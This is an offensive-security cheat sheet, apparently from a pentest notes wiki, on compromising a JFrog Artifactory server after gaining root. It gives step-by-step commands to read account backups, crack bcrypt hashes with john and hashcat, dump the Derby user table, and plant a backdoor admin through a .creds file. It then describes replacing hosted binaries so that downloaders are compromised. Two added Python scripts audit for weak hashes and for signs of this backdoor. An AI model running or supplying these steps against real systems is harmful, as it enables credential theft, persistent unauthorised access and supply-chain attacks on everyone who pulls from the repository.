# Artifactory

Check status: `ps aux | grep artifactory`

External access: `http://serverip:8081`

## Sensitive information

With root access to the server, check `/{ARTIFACTORY FOLDER}/var/backup/access` for exported Artifactory (Access) accounts:

{% code overflow="wrap" %}

```
root@controller:/opt/jfrog/artifactory/var/backup/access# cat access.backup.20200730120454.json
```

{% endcode %}

Look for the `"password"` field of each account; it holds a bcrypt hash:

{% code title="hash.txt" %}

```
$2a$08$xxxx./yyyy
```

{% endcode %}
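The following is an added example, not code from the original notes or from JFrog: a small auditor that walks an Access backup export and reports every `password` field together with its bcrypt cost factor. The layout of the real backup JSON is not documented on this page, so the walker does not depend on it and finds `password` keys at any depth; the sample document is constructed. The `$2a$08$` prefix shown above means cost 8, which is low enough that an offline dictionary attack like the one below finishes quickly, so the audit flags anything under a chosen minimum cost.

```python
import json
import re
import sys

# Constructed sample in roughly the shape of an Access backup export.
# The real file's structure is not documented on this page; the walker
# below finds "password" keys at any depth and does not rely on it.
SAMPLE_BACKUP = json.dumps({
    "users": [
        {"username": "admin",
         "password": "$2a$08$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"},
        {"username": "ci-bot",
         "password": "$2a$12$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234"},
        {"username": "svc", "password": "not-a-bcrypt-hash"},
    ]
})

# bcrypt modular-crypt format: $2a$/$2b$/$2y$, two-digit cost, then a
# 22-character salt and 31-character digest (53 chars) from ./A-Za-z0-9.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")


def iter_password_fields(node, path="$"):
    """Yield (json_path, username_or_None, value) for every 'password' key at any depth."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "password" and isinstance(value, str):
                yield path, node.get("username"), value
            else:
                yield from iter_password_fields(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from iter_password_fields(value, f"{path}[{i}]")


def audit_backup(text, min_cost=10):
    """Return one finding per password field: bcrypt or not, its cost, and whether it is below min_cost."""
    findings = []
    for path, username, value in iter_password_fields(json.loads(text)):
        match = BCRYPT_RE.match(value)
        cost = int(match.group(1)) if match else None
        findings.append({
            "path": path,
            "username": username,
            "bcrypt": match is not None,
            "cost": cost,
            "weak": cost is not None and cost < min_cost,
        })
    return findings


if __name__ == "__main__":
    # Pass a backup file path to audit it; with no argument the constructed sample is used.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_BACKUP
    for finding in audit_backup(data):
        print(finding)
```

Run it against a real `access.backup.*.json` to list which accounts are stored with a low cost factor or with a value that is not bcrypt at all; the threshold of 10 is an assumption, pick whatever your password policy requires.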

### Crack password

```
sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

Or with hashcat (bcrypt is hash type 3200)[^1]:

```
hashcat --force --hash-type=3200 hash.txt /usr/share/wordlists/rockyou.txt
```

## Compromise DB

{% code title="dump db & unlock" overflow="wrap" %}

```
# copy the Access Derby database out of the install and drop the lock files
# so a second process can open the copy
mkdir /tmp/hackeddb
sudo cp -r /opt/jfrog/artifactory/var/data/access/derby /tmp/hackeddb
sudo chmod 755 /tmp/hackeddb/derby
sudo rm /tmp/hackeddb/derby/*.lck
```

{% endcode %}

Artifactory uses Apache Derby as its default database, so connecting to the copy requires Apache's Derby tools, specifically the *ij* command-line client, which opens a Derby database and runs SQL queries against it. The Derby tools are already installed on the controller at /opt/derby, but they can also be downloaded if necessary.

Fortunately for us, the default database does not require a username and password and relies on file permissions alone to protect it, so with *root* privileges we can connect without problems. Artifactory ships its own Java runtime, which we can use to run the Derby utilities and connect to the copied database.

Start *ij* with Artifactory's bundled Java[^2]:

```
sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij
```

```
ij> connect 'jdbc:derby:/tmp/hackeddb/derby';
ij> select * from access_users;
```

Crack the bcrypt hashes from the `password` column as above.

## Add backdoor user

This method requires write access to the /opt/jfrog/artifactory/var/etc/access folder and the ability to change permissions on the newly created file, which usually requires *root* or *sudo* access.

Create the credentials file in `/opt/jfrog/artifactory/var/etc/access`; each line is `user@ip=password`, with `*` matching any source IP:

{% code title="create hack.creds" %}

```
admin2@*=adminpwd
```

{% endcode %}

{% code overflow="wrap" %}

```
sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/hack.creds
```

{% endcode %}

{% code overflow="wrap" %}

```
# restart so the Access service picks up the new .creds file on bootstrap
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop
sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start

# confirm the account was created
sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log
```

{% endcode %}

We now have admin access to Artifactory and can modify binaries as we see fit.
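From the defender's side, the two artefacts this technique leaves behind are a `.creds` file in the Access etc folder and a "Create admin user" line in console.log. The following is an added example, not code from the original notes or from JFrog, that audits both: it lists every `*.creds` file in the folder (the page shows a custom-named `hack.creds` being consumed, so the glob is deliberately wider than `bootstrap.creds`), checks that each is owner-only, parses the accounts it would create, and pulls the admin-creation lines out of a log. The sample creds text and log lines are constructed, as the real console.log format is not shown on this page beyond the grep string.

```python
import re
import stat
import sys
from pathlib import Path

# Constructed sample of a bootstrap creds file, in the page's user@ip=password format.
SAMPLE_CREDS = """\
# comment line
admin2@*=adminpwd
deploy@10.0.0.5=s3cret
"""

# Constructed console.log lines (not real Artifactory output); the page only
# shows that the phrase "Create admin user" appears when a bootstrap user is made.
SAMPLE_LOG = [
    "2020-07-30T12:04:54.000Z [jfac ] [INFO ] Access server started",
    "2020-07-30T12:04:55.000Z [jfac ] [INFO ] Create admin user admin2 from bootstrap creds",
    "2020-07-30T12:05:00.000Z [jfrt ] [INFO ] Artifactory started",
]

# user, then @, then an IP or '*', then '=' and the password (which may itself contain '=')
CREDS_LINE = re.compile(r"^([^@=\s]+)@([^=\s]+)=(.*)$")


def parse_creds(text):
    """Return [(user, source_ip, has_password)] for every credential line, skipping blanks and comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = CREDS_LINE.match(line)
        if match:
            entries.append((match.group(1), match.group(2), bool(match.group(3))))
    return entries


def find_admin_creation(lines):
    """Return the log lines that record a bootstrap admin being created."""
    return [line for line in lines if "Create admin user" in line]


def mode_is_private(mode):
    """True when no group or other permission bits are set (0600 or tighter)."""
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def audit_access_dir(path):
    """Report each *.creds file under the Access etc dir: owner-only or not, and the users it defines."""
    report = []
    for creds in sorted(Path(path).glob("*.creds")):
        mode = stat.S_IMODE(creds.stat().st_mode)
        report.append({
            "file": str(creds),
            "private": mode_is_private(mode),
            "users": parse_creds(creds.read_text()),
        })
    return report


if __name__ == "__main__":
    # Default paths are the ones used on this page; override with arguments.
    access_dir = sys.argv[1] if len(sys.argv) > 1 else "/opt/jfrog/artifactory/var/etc/access"
    log_path = sys.argv[2] if len(sys.argv) > 2 else "/opt/jfrog/artifactory/var/log/console.log"
    for entry in audit_access_dir(access_dir):
        print(entry)
    try:
        with open(log_path) as fh:
            for hit in find_admin_creation(fh):
                print("admin created:", hit.rstrip())
    except OSError as exc:
        print("could not read log:", exc)
```

Any `*.creds` file that exists after the service has been bootstrapped, or a "Create admin user" line that does not match a planned install, is worth treating as an incident; forwarding console.log to a central collector and alerting on that string turns the page's grep into a standing detection.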

In a real-world scenario, **if the user was using Artifactory as a repository, running an update on their local system would trigger a download of the updated binary. The next time the binary is run by the user, they would be compromised.** The same would occur if Artifactory was being used as a simple file store for shared binary files. Any subsequent downloads of our updated file would result in the user being compromised.

Artifactory is an excellent option for compromising many targets in a single effort and can help to expand access significantly within an internal network.

[^1]: `--force` can be omitted when running outside of a VM; add `-d <device id>` to select the hardware device used for cracking.

[^2]: The first part of the command calls the embedded version of Java included as part of Artifactory. We're specifying that we want to run the derbyrun.jar JAR file. The ij parameter indicates that we want to use Apache's *ij* tool to access the database.
